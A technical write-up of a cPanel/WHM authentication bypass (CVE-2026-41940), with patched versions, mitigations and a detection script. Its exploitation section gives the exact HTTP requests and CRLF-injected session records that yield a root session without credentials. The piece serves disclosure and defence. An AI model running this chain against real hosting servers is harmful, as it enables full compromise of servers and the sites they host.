Deep Dive into cPanel/WHM Auth Bypass Vulnerability (CVE‑2026‑41940)

watchTowr Labs discovered a critical authentication bypass (CVE‑2026‑41940) affecting all supported cPanel & WHM versions: a crafted HTTP request injects records into a session file and yields root access, and exploitation has been observed in the wild. The article details the flaw, the exploitation chain, its impact, and mitigation steps.


Vulnerability Overview

cPanel & WHM is a widely deployed shared‑hosting control panel managing over 70 million domains. WHM provides root‑level server access; cPanel is the user‑side interface.

CVE‑2026‑41940 is an authentication‑bypass flaw affecting all supported versions. Patched releases are:

cPanel & WHM 110.0.x → 11.110.0.97 (was 11.110.0.96)

cPanel & WHM 118.0.x → 11.118.0.63 (was 11.118.0.61)

cPanel & WHM 126.0.x → 11.126.0.54 (was 11.126.0.53)

cPanel & WHM 132.0.x → 11.132.0.29 (was 11.132.0.27)

cPanel & WHM 134.0.x → 11.134.0.20 (was 11.134.0.19)

cPanel & WHM 136.0.x → 11.136.0.5 (was 11.136.0.4)

KnownHost has confirmed active exploitation in the wild.

[Figure: cPanel/WHM architecture and attack surface]

Technical Details

Session File Structure

cPanel stores sessions as files:

Raw file: /var/cpanel/sessions/raw/<session_id>
Cache file (JSON): /var/cpanel/sessions/cache/<session_id>

The raw file holds one key=value record per line (the cache holds the same data as JSON). Example of a failed‑login session:

local_ip_address=172.17.0.2
external_validation_token=bOOwkwVzFsruooU0
cp_security_token=/cpsess7833455106
needs_auth=1
origin_as_string=address=172.17.0.1,app=whostmgrd,method=badpass
hulk_registered=0
tfa_verified=0
ip_address=172.17.0.1
local_port=2087
port=49254
login_theme=cpanel

The session‑ID cookie has the form :Wg_mjzgt1hyfXefK,1bd3d4bf5ecbf83b660789ab0f3198fa. The 32‑hex‑character segment after the comma is the <ob> per‑session key used to encrypt the pass field.

[Figure: location of the <ob> segment in code]

Vulnerability Mechanics

The flaw combines two issues:

Issue 1: Unfiltered CRLF injection

In saveSession, when the <ob> segment is absent the encoder is never invoked and the pass field is written without per‑session encryption:

if (defined $ob && length $ob) {
    my $encoder = Cpanel::Session::Encoder->new('secret' => $ob);
    $session_ref->{'pass'} = $encoder->encode_data($session_ref->{'pass'});
} else {
    $session_ref->{'pass'} = 'no-ob:' . Cpanel::Session::Encoder->hex_encode_only($session_ref->{'pass'});
}

The set_pass routine strips only NUL bytes, preserving a \r\n sequence injected via the HTTP Basic‑Auth header.

[Figure: code modification details]
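As an added illustration (not cPanel's code), the following Python models the line‑oriented key=value session layout from the Session File Structure section, with the NUL‑only stripping described for set_pass beside a hardened setter that rejects line terminators; the function names and the round‑trip helper are assumptions.

```python
import re


def serialize(session: dict) -> str:
    """Write records in the raw session layout: one key=value per line."""
    return "".join(f"{k}={v}\n" for k, v in session.items())


def parse_raw(text: str) -> dict:
    """Read the raw layout back; every line containing '=' becomes a record."""
    records = {}
    for line in text.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            records[key] = value
    return records


def set_pass_weak(session: dict, value: str) -> None:
    """Models the flaw described above: only NUL bytes are stripped."""
    session["pass"] = value.replace("\x00", "")


def set_pass_hardened(session: dict, value: str) -> None:
    """Reject any control character before the value reaches the
    line-oriented store; a CR/LF inside it would split into new records."""
    if re.search(r"[\x00-\x1f\x7f]", value):
        raise ValueError("pass must not contain control characters")
    session["pass"] = value


def injected_keys(setter, value: str) -> set:
    """Round-trip a failed-login session (constructed sample) through
    serialize/parse and return record names that were never set."""
    session = {"needs_auth": "1", "user": "root"}
    setter(session, value)
    return set(parse_raw(serialize(session))) - set(session)
```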

Issue 2: Cache‑first loading

The loadSession function prefers the JSON cache file over the raw file. Injected records in the raw file are not parsed because the cached pass value remains a single string containing the injected \r\n.

Exploitation Chain

Step 1: Create a pre‑auth session

POST /login/?login_only=1 HTTP/1.1
Host: target:2087
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

user=root&pass=wrong

The response includes a cookie, e.g.:

Set-Cookie: whostmgrsession=%3aQSJN_sFdKZtCi2o_%2c4d257abc371539dfebdf7d3a3e64de0b

Decoded value: :QSJN_sFdKZtCi2o_,4d257abc371539dfebdf7d3a3e64de0b

Step 2: Inject malicious records

The password part of the Basic‑Auth credential is built from the following lines, joined with \r\n:

x
hasroot=1
tfa_verified=1
user=root
cp_security_token=/cpsess9999999999
successful_internal_auth_with_timestamp=1777462149

Base64‑encode the credential and send the request. The cookie retains only the name part (the ,<obhex> is stripped), so no <ob> key is available and the pass value, with its injected lines, is written into the raw session file:

GET / HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=%3aQSJN_sFdKZtCi2o_
Authorization: Basic <base64(root:payload)>

Resulting raw session file:

pass=x
hasroot=1   <-- injected
tfa_verified=1   <-- injected
user=root   <-- injected
cp_security_token=/cpsess9999999999   <-- injected
successful_internal_auth_with_timestamp=1777462149   <-- injected

Step 3: Promote injection to the cache

Trigger Cpanel::Session::Modify->new + save with nocache=>1 to force reading the raw file and updating the JSON cache. Example request:

GET /scripts2/listaccts HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=%3aQSJN_sFdKZtCi2o_

The response is “401 Token Denied”, but the cache JSON now contains the injected keys:

{
  "tfa_verified":"1",
  "user":"root",
  "hasroot":"1",
  "successful_internal_auth_with_timestamp":"1777462149",
  ...
}

Step 4: Bypass password verification

The function docheckpass_whostmgrd checks for the successful_internal_auth_with_timestamp field; if present, it returns AUTH_OK without consulting /etc/shadow:

sub check_authok_user {
    if ($AUTHOPTS{'authable_user'}{'successful_internal_auth_with_timestamp'}) {
        return $Cpanel::Server::AUTH_OK, 0;  # no /etc/shadow lookup
    }
}

Step 5: Verify privileged access

GET /json-api/version HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=%3aQSJN_sFdKZtCi2o_

The server returns “200 OK” instead of “403 Forbidden”, confirming a root‑level session.

Impact Assessment

Scope

All supported cPanel & WHM versions (see patched list)

Over 70 million domains worldwide

Attacker gains full root privileges on the host

Active exploitation confirmed by KnownHost

Attack Prerequisites

Target runs a vulnerable cPanel/WHM version

Attacker can send HTTP requests to ports 2087/2086

No valid credentials are required

Severity

CVSS score pending official rating (estimated >9.0)

Exploit complexity: low (only crafted HTTP request)

Attack vector: network

Privilege escalation: full root

Mitigation and Defense

Immediate Patch

Upgrade to the patched versions listed in the overview.

Back up all data and configuration.

Validate the upgrade process in a test environment.

Schedule the upgrade during a maintenance window.

Temporary Workarounds

Restrict access to ports 2087/2086 to trusted IPs.

Enable firewall rules to block abnormal Basic‑Auth requests.

Deploy WAF signatures that detect the CRLF injection pattern.

Monitor /var/cpanel/sessions/raw/ and /var/cpanel/sessions/cache/ for unexpected modifications.

Watch for the appearance of the successful_internal_auth_with_timestamp field in session files.

Use the Detection Artifact Generator released by watchTowr Labs (GitHub repository URL provided below).
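An added triage script (not the watchTowr Detection Artifact Generator and not cPanel code) that applies the two monitoring items above to the raw and cache session files described under Session File Structure; the indicator names and the failed‑login heuristic (success markers on a session that is still needs_auth=1 or came from method=badpass) are assumptions.

```python
import json
import os
import re

LINE_BREAK = re.compile(r"[\r\n]")
SUCCESS_KEY = "successful_internal_auth_with_timestamp"

def parse_raw(text: str) -> dict:
    """Raw layout: one key=value record per line, split on the first '='."""
    records = {}
    for line in text.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            records[key] = value
    return records

def triage(raw_text: str, cache_text: str = "") -> list:
    """Return the indicator names that fire for one session."""
    raw = parse_raw(raw_text)
    try:
        cache = json.loads(cache_text) if cache_text else {}
    except ValueError:
        cache = {}  # unreadable cache: still triage the raw records
    hits = []
    # Page: the cached pass keeps the injected CRLF as one string; genuine values never do.
    if any(LINE_BREAK.search(str(d.get("pass", ""))) for d in (raw, cache)):
        hits.append("crlf_in_pass")
    for d in (raw, cache):
        # Heuristic (assumption): a needs_auth=1 or method=badpass session has no success markers.
        failed = str(d.get("needs_auth")) == "1" or "method=badpass" in str(d.get("origin_as_string", ""))
        if failed and (SUCCESS_KEY in d or str(d.get("hasroot")) == "1"):
            hits.append("success_marker_on_failed_login")
            break
    return hits

def scan_dir(sessions_dir: str = "/var/cpanel/sessions") -> dict:
    """Map session id -> findings for every raw file; the cache file is optional."""
    out = {}
    for sid in os.listdir(os.path.join(sessions_dir, "raw")):
        with open(os.path.join(sessions_dir, "raw", sid), errors="replace") as f:
            raw_text = f.read()
        cache_text = ""
        cache_path = os.path.join(sessions_dir, "cache", sid)
        if os.path.isfile(cache_path):
            with open(cache_path, errors="replace") as f:
                cache_text = f.read()
        if hits := triage(raw_text, cache_text):
            out[sid] = hits
    return out
```

Run scan_dir() as root on a host and compare flagged session ids against the login and access logs before treating them as confirmed compromise.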

Verify Patch Status

Check the installed version: /usr/local/cpanel/cpanel -V

Confirm session file permissions: ls -la /var/cpanel/sessions/

Audit logs for suspicious authentication entries: grep -i "auth" /var/log/secure or /var/log/messages

Timeline

2026‑03‑27 – Vulnerability first disclosed.

2026‑03‑31 – Patch versions released (4 days later).

2026‑04 onward – KnownHost observes in‑the‑wild exploitation.

2026‑05‑01 – watchTowr Labs publishes full technical analysis.

References

cPanel official security advisory: https://support.cpanel.net/hc/en-us/articles/40073787579671-Critical-Vulnerability-with-cPanel-WHM-Login-Authentication

watchTowr Labs technical report: https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

Detection tool GitHub repository: https://github.com/watchTowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

KnownHost exploitation confirmation (Reddit): https://www.reddit.com/r/cpanel/comments/1syyajp/comment/oiyg0fr/

Written by Black & White Path